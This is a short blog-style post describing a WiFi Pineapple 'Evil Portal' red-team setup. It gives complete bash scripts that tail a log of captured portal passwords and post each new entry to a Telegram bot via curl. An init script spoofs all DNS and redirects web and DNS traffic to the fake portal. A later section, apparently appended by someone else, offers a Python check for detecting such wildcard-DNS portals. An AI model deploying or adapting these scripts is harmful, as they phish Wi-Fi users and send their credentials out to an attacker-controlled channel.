Short story: Send captured credentials to telegram bot
A couple of years ago I made a bash script that helped me do a hot read of a file, and every time that file was updated it sent a message from the Telegram bot (https://vay3t.medium.com/creando-un-notificador-en-telegram-con-bash-b842490610).
With that idea I molded it for use on the WiFi Pineapple, and in this way have Telegram notifications for red team campaigns.
/root/notify.sh

```bash
#!/bin/bash
function urlencode() {
    # urlencode <string>  -- percent-encode everything except unreserved characters
    old_lc_collate=$LC_COLLATE
    LC_COLLATE=C
    local length="${#1}"
    for (( i = 0; i < length; i++ )); do
        local c="${1:$i:1}"
        case $c in
            [a-zA-Z0-9.~_-]) printf '%s' "$c" ;;
            *) printf '%%%02X' "'$c" ;;
        esac
    done
    LC_COLLATE=$old_lc_collate
}

token="TOKENOFBOT"   # bot token from @BotFather
id="IDUSER"          # chat id that receives the messages

# With a file argument and no terminal on stdin, send the file contents; otherwise send a test "beep"
if [ "$1" != "" ]; then
    if [ ! -t 0 ]; then
        msj="$(cat "$1")"
    fi
else
    msj="beep"
fi
msj=$(urlencode "$msj")
url="https://api.telegram.org/bot$token/sendMessage"
curl -s -X POST "$url" -d chat_id="$id" -d text="$msj" &> /dev/null
if [ $? -ne 0 ]; then
    echo "Error with bot"
fi
```

/root/hotreader.sh

```bash
#!/bin/bash
file="/www/.logs"
lines=$(cat "$file" | wc -l)
###while inotifywait -q -e modify $file; do
# Monitor mode: one line per modify event; forward only the lines appended since the previous event
inotifywait -q -m -e modify "$file" | while read filename event; do
    linesNow=$(cat "$file" | wc -l)
    tail -n $(($linesNow-$lines)) "$file" > /tmp/out.out && bash /root/notify.sh /tmp/out.out
    lines=$linesNow
done
```

/etc/init.d/evilportal

```sh
#!/bin/sh /etc/rc.common
# This is the auto-start script for EvilPortal
START=200
start() {
    # Enable ip forward.
    echo 1 > /proc/sys/net/ipv4/ip_forward
    # Remove old authorized clients list
    rm /tmp/EVILPORTAL_CLIENTS.txt
    /etc/init.d/php7-fpm start
    /etc/init.d/nginx start
    # Start DNS MASQ to spoof * for unauthorized clients
    dnsmasq --no-hosts --no-resolv --address=/#/172.16.42.1 -p 5353
    # Symlink evilportal portal api
    rm /www/captiveportal
    ln -s /pineapple/ui/modules/evilportal/assets/api /www/captiveportal
    # Run iptables commands
    iptables -t nat -A PREROUTING -i br-lan -p tcp --dport 443 -j DNAT --to-destination 172.16.42.1:80
    iptables -t nat -A PREROUTING -i br-lan -p tcp --dport 80 -j DNAT --to-destination 172.16.42.1:80
    iptables -t nat -A PREROUTING -i br-lan -p tcp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
    iptables -t nat -A PREROUTING -i br-lan -p udp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
    sleep 10
    # Start the log watcher in the background once the portal is up
    bash /root/hotreader.sh &
}
stop() {
    /etc/init.d/php7-fpm stop
    /etc/init.d/nginx stop
    kill $(netstat -plant | grep 5353 | awk '{print $NF}' | sed 's/\/dnsmasq//g' | head -n 1)
    rm /www/captiveportal
    iptables -t nat -D PREROUTING -i br-lan -p tcp --dport 443 -j DNAT --to-destination 172.16.42.1:80
    iptables -t nat -D PREROUTING -i br-lan -p tcp --dport 80 -j DNAT --to-destination 172.16.42.1:80
    iptables -t nat -D PREROUTING -i br-lan -p tcp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
    iptables -t nat -D PREROUTING -i br-lan -p udp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
    # Stop the log watcher (head -2 also catches the grep process itself)
    kill $(ps aux | grep hotreader.sh | head -2 | awk '{print $2}')
}
disable() {
    rm /etc/rc.d/*evilportal
    kill $(ps aux | grep hotreader.sh | head -2 | awk '{print $2}')
}
```

I would like to work more but I'm not very good at developing web applications.
Notes:
- The log file of the captured passwords should be blocked with an .htaccess or any other type of protection from public web access.
- It is possible that my solution is vulnerable to RCE due to the nature of Bash, but I think that using Python would be a good alternative.
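The init script above answers every DNS name with the portal's own address (dnsmasq --address=/#/172.16.42.1) and DNATs ports 53, 80 and 443 to it, which is also what a client can look for. The check below is an added example, not part of this issue or of the EvilPortal module: it resolves several unrelated canary names and flags the network when most of them collapse to one address. The resolver is passed in as a function, so the constructed answer tables run offline; system_resolve uses the OS resolver for a live check.

```python
"""Client-side check for a wildcard-DNS captive portal (every name -> one address)."""
import socket
from collections import Counter
from typing import Callable, Dict, Iterable, List

# Unrelated names; on a healthy network they never all share one address.
CANARY_NAMES = ["example.com", "example.net", "example.org", "iana.org"]

def system_resolve(name: str) -> List[str]:
    """Resolve a name with the OS resolver (IPv4 only); [] on failure."""
    try:
        infos = socket.getaddrinfo(name, 80, socket.AF_INET, socket.SOCK_STREAM)
        return sorted({info[4][0] for info in infos})
    except socket.gaierror:
        return []

def wildcard_dns_check(names: Iterable[str], resolve: Callable[[str], List[str]],
                       threshold: float = 0.75) -> Dict[str, object]:
    """Flag the network when at least `threshold` of the answered names
    resolve to the same address, as dnsmasq --address=/#/X produces."""
    answers = {n: resolve(n) for n in names}
    answered = [ips for ips in answers.values() if ips]
    if not answered:
        return {"suspicious": False, "address": None, "share": 0.0, "answers": answers}
    hits = Counter(a for ips in answered for a in ips)
    top_addr, count = hits.most_common(1)[0]
    share = count / len(answered)
    return {"suspicious": share >= threshold, "address": top_addr,
            "share": share, "answers": answers}

# Constructed sample answers (documentation address ranges, not real records).
PORTAL_ANSWERS = {n: ["172.16.42.1"] for n in CANARY_NAMES}   # every name -> portal
HEALTHY_ANSWERS = {"example.com": ["192.0.2.10"], "example.net": ["198.51.100.7"],
                   "example.org": ["203.0.113.21"], "iana.org": ["192.0.2.44"]}

def check_constructed(sample: Dict[str, List[str]]) -> Dict[str, object]:
    """Run the check against a constructed answer table instead of the network."""
    return wildcard_dns_check(CANARY_NAMES, lambda n: sample.get(n, []))

if __name__ == "__main__":
    for label, sample in (("portal", PORTAL_ANSWERS), ("healthy", HEALTHY_ANSWERS)):
        verdict = check_constructed(sample)
        print(f"{label}: suspicious={verdict['suspicious']} address={verdict['address']}")
    live = wildcard_dns_check(CANARY_NAMES, system_resolve)
    print(f"live: suspicious={live['suspicious']} address={live['address']}")
```

A network that also DNATs 80/443 will show the same address in the TCP connection as in DNS, so pairing this with a check of the HTTP response from a known-plain URL is the natural next step.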